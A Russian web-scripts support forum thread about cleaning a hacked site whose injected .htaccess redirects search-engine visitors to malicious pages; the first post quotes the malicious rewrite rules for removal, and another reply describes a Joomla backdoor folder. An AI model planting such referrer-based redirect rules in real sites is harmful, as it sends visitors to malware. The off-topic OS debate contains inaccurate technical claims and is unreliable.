Бесплатные PHP скрипты - форум техподдержки

Бесплатные PHP скрипты - форум техподдержки

Форум техподдержки WR-Скриптов на php. Обсуждаем: основы программирования на PHP 5 - 7 версий, различные подходы к написанию скриптов на php 7 без MySQL. А также WR-скрипты: бесплатные доски объявлений, скрипты форумов, Гостевые книги, Каталог ссылок, Галерея, Фотоальбом, Счётчики, Рассылки, Анекдот и другие. Принимаются пожелания для новых версий. Сообщите какой скрипт нужен для Вашего сайта, постараемся найти или реализовать. Скачать скрипты можно бесплатно. Вместе мы сделаем бесплатные php скрипты лучше и доступнее!

Главная сайта бесплатных php скриптовГлавная сайта   ПоискПоиск  
Сегодня: 13.11.2024 - 22:04:24
Страницы:  1  

Как вылечить перенаправление на вредоносные сайты

Объявление - WR-Scriptы в UTF-8 кодировке

Активно обновляю скрипты и перевожу их в UTF-8 кодировку. Список перекодированных php скриптов доступен на главной странице сайта. Скачивайте скрипты и устанавливайте на свой сайт! В ближайшее время обновлю каталог знакомств, форум Про, фотоальбом, доски объявлений лайт и ЛЮКС.

На форуме, пожалуйста, пишите что модернизировать в скриптах в первую очередь. Постараюсь исправить большую часть пожеланий!
Планирую продолжить работы весь 2023 год.

АвторСообщение

Нина

Н
гость

Решила написать о недавнем взломе сайта моей знакомой. Звонит мне Ира, говорит, трафик (посещаемость) на ее сайте резко снизился, чуть ли не до нуля – нажимаешь на какие-то ссылки на сайте – открываются не нужные страницы – загружаются вредоносные сайты, появляются новые папки на хостинге в ее сайте – в общем - ужас какой-то.

Когда пользователи открывают ее сайт – их просят установить антивирус и говорят, что сайт заражен программами-шпионами.

Если щелкнуть на картинку-ссылку левой кнопкой и посмотреть путь на зараженном сайте – появляется не обычный путь размещения картинки, а строка вида –

http : / / spyware-software.info/0/go.php?sid=2

Нашли информацию – это взлом FTP (подобранный пароль, если он несложный) и файла .htaccess, который обычно находится на один уровень выше на хостинге, чем папка /public html. Нужно открыть Блокнотом файл .htaccess и удалить оттуда строки типа:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://XX.XXX.XXX.XX/in.html?s=ipw2 [R,L]

Сам файл .htaccess удалять не нужно. Даже если в нем после удаления вредоносного кода ничего нет. Просто оставьте пустой файл и выставьте права доступа к файлу .htaccess «644». (Каждый может этот файл прочитать – но перезаписывать – только владелец сайта).

Мы поменяли пароль на FTP – выбрали самый сложный. Антивирус обновили, проверили компьютер. И не стали запоминать пароли в VC и Dreamweaver. Сайт полностью перезалили с резервной копии – сначала стираешь все файлы в папке /public html (папке хранения сайта – для форматирования), а потом записываешь все новые файлы с резервной копии. Сейчас все нормально.
Я надеюсь, вы не забываете делать резервные копии вашего сайта? :)

Сообщение # 1 27.04.09 - 13:49:39

Maksir

M
Участник форума

Нда.. однако.. =)
Вирусы...
Нина, есть операционные системы, в которых вирусы - не живут. Как вам такая новость? =)
Да и программы там есть все необходимые для работы, бесплтано. Хотите офис, или для графики что-нибудь.. И платные есть, по мере необходимости, потребности. Драйверов ненужно никаких. Обновления системы делается легко, если рядом интернет. Даже кодеки на халяву без лишних телодвижений можно установить, все самое свежее, - одним кликом по мышке.

О правильном хостинге нужно заботиться в вашея говорю о профессиональном хостинге, который стоит на Unix. Все что работает на Unix, в Windows - всего лишь эмуляция. Вы изначально воспринимаете ОС такой, какая она есть. А, какая же она есть на самом деле? Вот вам подсовывают Windows и для вас "компьютер и вирус" это синоним.

Главное отличие Windows от Unix (и им подобным) состоит в том, что Windows не имеет разделений между процессами. Любой процесс задачи можно обойти любым другим процессом. Прав на файл у пользователей Windows вообще нет, а потому владельцем может быть кто угодно. В Unix - имеется жёская динамичная архитектура прав, которую никто никогда не отменял.

По этому, атрибуты типа -- 644 на Windows-сервере, это всего лишь эмуляция Unix. В то время, как в действительности, файловая система Windows не гарантирует того, какие атрибуты вы прописываете.


Цитата:

Просто оставьте пустой файл и выставьте права доступа к файлу .htaccess «644»


Если этот файл ненужен, то его можно удалить. Он там ни к чему. Права 644 означают - чтение для всех групп пользователей и запись только для владельца. Можно сделать 400 , ошибки не будет, если ваш хостинг правильно отконфигурирован. Точка в начале файла означает, что это скрытый файл. В системе Unix все файлы и каталоги с такой точкой - невидимы для обычных пользователей, даже, если выставлен атрибут на чтение для всех, кто не является владельцем и в даже не включен в группу пользователей - абсолютные права для всех.

Сообщение # 2 27.04.09 - 18:35:21

Maksir

M
Участник форума

Умняка прокатил?

Ты вот скажи что, линукс может предложить карпарациям?
Что линукс может предложить рабочим группам?
Что линукс может предложить простым людям? а не заумным?
И почему апачь делаеться под виндовс а iis под линукс не делаеться?

Да потому что виндовс лучше, в 10 тысячь раз!!!
Его популярность говорит об этом. А вирусы пишуться теми кто пишет антивирусы, и линуксоидами обиженными на винду!

Сообщение # 3 16.08.09 - 22:11:18

Дмитрий

Д
Участник форума

Молодые люди!!! апаче под линуксом стоит, с тех когда линукс преобразился в графическою оболочку и работает на много быстрее чем виндоский апаче. Просто линукс сначала был чиста кровный сервер, аж потом со временем он отправился к людям. И зайти на сервер с под линукса на линукс не легко, а с под виндоса на сервер линус не возможно(файловая система разная), а вот с линукса на виндос(фунци есть для копирование виндоских разделов ) не составит труда для хакера который только учится. Хотя и говорят, что для взлома сайта не имеет значение, однако большинства серверов предпочитают линукс. А самая КРУТАЯ ОПЕРАЦИОННАЯ это которую на писал ты сам. И кто не согласен, пусть подумает хорошенько.

Сообщение # 4 07.09.09 - 02:30:11

HawkDoom

H
Участник форума

Maksir, линуксоид обиженный на винду - тупой ламер.
У каждой оси свои плюсы и надо использовать их на своё благо.
В винде играть, в linux юзать сервера и т.д. - глупо говорить что какая то ось круче =))
А популярность винды говорит лишь о раскрутке манагерами корпорации своих продуктов, линукс же продукт в основном бесплатный и его популярность говорит лишь о его достоинствах.
Я оч часто юзаю виндовс - в ней много сред разработки которые удобней чем в линукс.
но серверная часть наоборот

Сообщение # 5 25.09.10 - 16:22:36

Виктор

В
Участник форума


Цитата:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://XX.XXX.XXX.XX/in.html?s=ipw2 [R,L]


была похожая проблема. Решил следующим образом:после полной проверки структуры сайта в папке components обнаружилась папка com_hello внутри которой нашелся свежий файл htaccess (этот же файл постоянно генерился и в папке \\имя_сайта.ru\htacsess). это был как признак того что искать надо внутри com_hello . и действительно при открытии файла joolog.php microsoft essentials заругалась на бэкдор. далее сравнил нужен ли этот com_hello с структурой квик старта и удалил. PS еще обратил внимание что папка com_hello образовалась здесь значительно позже чем все остальные. но при этом я сам в то время ничего на сайт не ставил. это тоже был признак что она добавлена искусственно. успехов!

Сообщение # 6 04.03.12 - 19:39:43

WR

W
Участник форума

Спасибо за информацию. Вирусов эксплоитов всяких сейчас расплодилось много...

Сообщение # 7 06.03.12 - 17:13:27

salomonof

S
Участник форума

А если покупать его на долго хватит?

________________________
http://www.brandprint.ru/faksimile/

Сообщение # 8 11.03.13 - 14:31:47

WR

W
Участник форума

Недавно был и у меня завирусован файл .htaccess. Сразу же удалил вирусный файл и загрузил свой. Файл .htaccess у меня такой:


Код:


DirectoryIndex index.php index.html
AddDefaultCharset windows-1251
ExpiresActive on
ExpiresDefault "access plus 0 seconds"
ExpiresByType text/html "access plus 0 seconds"
Options +FollowSymLinks
ErrorDocument 404 /404.html

FileETag MTime Size
<ifmodule mod_expires.c>
<filesmatch ".(jpeg|jpg|gif|png|css|js)$">
ExpiresActive on
ExpiresDefault "access plus 1 month"
</filesmatch>
</ifmodule>

Options All -Indexes

Deny from 208.177.76.25
Deny from 195.128.48.65
Deny from 198.245.58.7
Deny from 1.234.83.43


Если кому то интересно, то могу объяснить что означает каждая из команд

Сообщение # 9 12.01.14 - 17:58:48
Защита от SQL-injection :Предыдущая темаСледующая тема: Закрытый форум
Страницы:  1  

Сообщение
Имя E-mail
Сообщение

Нажмите на точку возле имени для обращения к участнику

Смайлы:

Ещё смайлы
Эмодзи
         
Защитный код: (введите цифры, которые на синем фоне)
Ответ на вопрос: (Какой сейчас год?)
   
WR-Счётчик
Powered by WR-Forum Professional © 2.3 UTF-8 beta версия